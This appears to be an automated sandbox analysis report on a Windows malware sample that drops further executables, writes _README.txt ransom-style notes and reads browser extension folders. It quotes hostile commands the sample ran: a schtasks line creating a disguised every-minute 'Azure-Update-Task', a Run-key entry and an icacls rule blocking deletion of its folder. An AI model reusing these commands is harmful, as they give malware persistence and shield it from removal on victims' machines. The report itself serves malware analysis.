Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\BlB- source: R5391762lf.exe, 00000007.00000003.2135149537.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\Temp\wy\ion Data\Application Data\Application Data\Microsoft\input\en-ZW\\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\\T source: R5391762lf.exe, 00000007.00000003.2079190952.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2078852071.0000000003429000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2083952112.000000000346D000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067121029.0000000003429000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: load_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\M source: R5391762lf.exe, 00000007.00000003.2099831348.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101510258.000000000370A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2081263289.000000000373B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946934767.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100414663.0000000003703000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102557757.0000000003712000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079360767.00000000036F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\AC\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\H\* source: R5391762lf.exe, 00000007.00000003.1682135563.000000000315F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682296747.000000000316C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682038409.000000000315E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1684204652.0000000003170000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682185359.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: QNBBNQ~1.BGJQNBBNqWD9F_Blep-UqQSqnMp-FI[1].css.bgjs06avERkAqfuwcXY6H5w8dtNc[1].css.bgjst44F3556BE808F99573969118A8E36879BA1ADA6Ction Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\db source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ata\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: R5391762lf.exe, 00000007.00000003.2101462932.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\ source: R5391762lf.exe, 00000007.00000003.2080570314.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2078665185.0000000003491000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2066983991.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2103034298.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2098976504.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2080800658.00000000034DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*F source: R5391762lf.exe, 00000007.00000003.2135261521.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135214422.00000000034C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\J source: R5391762lf.exe, 00000007.00000003.2161457141.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147352148.0000000003A91000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\MSO source: R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\te\ source: R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.1681931238.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681857238.0000000003192000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\y\\ source: R5391762lf.exe, 00000007.00000003.2136464726.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146776038.00000000037AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\s\U source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051158018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2082039763.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051285855.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2052379835.00000000037D7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\P source: R5391762lf.exe, 00000007.00000003.2135081077.0000000003985000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147440371.00000000039A6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135303170.00000000039D6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.0000000003994000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\\ source: R5391762lf.exe, 00000007.00000003.2066700717.000000000319C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2149833514.000000000376F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\D source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: R5391762lf.exe, 00000007.00000003.2135261521.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135214422.00000000034C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Y' source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\^ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\R5391762lf.exe Unpacked PE file: 2.2.R5391762lf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Unpacked PE file: 8.2.R5391762lf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Unpacked PE file: 11.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Unpacked PE file: 14.2.R5391762lf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Unpacked PE file: 16.2.build3.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Unpacked PE file: 24.2.R5391762lf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 28.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 33.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\R5391762lf.exe Unpacked PE file: 2.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Unpacked PE file: 8.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Unpacked PE file: 11.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Unpacked PE file: 14.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Unpacked PE file: 16.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Unpacked PE file: 24.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 28.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 33.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle, 2_2_00412220
Source: build3[1].exe.7.dr Static PE information: section name: .kic
Source: sqln[1].dll.11.dr Static PE information: section name: .00cfg
Source: mstsca.exe.16.dr Static PE information: section name: .kic
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_00406805 push ecx; ret 0_2_00406818
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_0449B0AF push ecx; retf 0_2_0449B0B2
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_05EC8F05 push ecx; ret 0_2_05EC8F18
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_00428565 push ecx; ret 2_2_00428578
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 5_2_044590AF push ecx; retf 5_2_044590B2
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 5_2_05DD8F05 push ecx; ret 5_2_05DD8F18
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Code function: 6_2_0457B0AF push ecx; retf 6_2_0457B0B2
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Code function: 6_2_05EE8F05 push ecx; ret 6_2_05EE8F18

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\R5391762lf.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe.bgjs (copy)
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Temp\wctF86A.tmp
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dll
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\Local Settings\Temp\wctF86A.tmp.bgjs (copy)
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\_README.txt
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\$WinREAgent\_README.txt
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\$WinREAgent\Scratch\_README.txt
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\_README.txt
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe File created: C:\Users\user\_README.txt

Boot Survival

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\Desktop\R5391762lf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_00405653 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00405653
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\R5391762lf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_0449971C rdtsc 0_2_0449971C
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 2_2_0040E670
Source: C:\Users\user\Desktop\R5391762lf.exe Thread delayed: delay time: 700000
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Window / User API: threadDelayed 2142
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Window / User API: threadDelayed 7857
Source: C:\Users\user\Desktop\R5391762lf.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe.bgjs (copy)
Source: C:\Users\user\Desktop\R5391762lf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe
Source: C:\Users\user\Desktop\R5391762lf.exe Dropped PE file which has not been started: C:\Users\jones\AppData\Local\Temp\wctF86A.tmp
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dll
Source: C:\Users\user\Desktop\R5391762lf.exe Dropped PE file which has not been started: C:\Users\jones\Local Settings\Temp\wctF86A.tmp.bgjs (copy)
Source: C:\Users\user\Desktop\R5391762lf.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\R5391762lf.exe TID: 7700 Thread sleep time: -700000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5288 Thread sleep count: 2142 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5288 Thread sleep time: -481950s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5288 Thread sleep count: 7857 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5288 Thread sleep time: -1767825s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 2_2_00410160
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 2_2_0040F730
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 2_2_0040FB98
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: R5391762lf.exe, 00000002.00000002.1397540119.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000003.1391033574.00000000006A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW'H
Source: R5391762lf.exe, 00000002.00000002.1397540119.000000000067A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
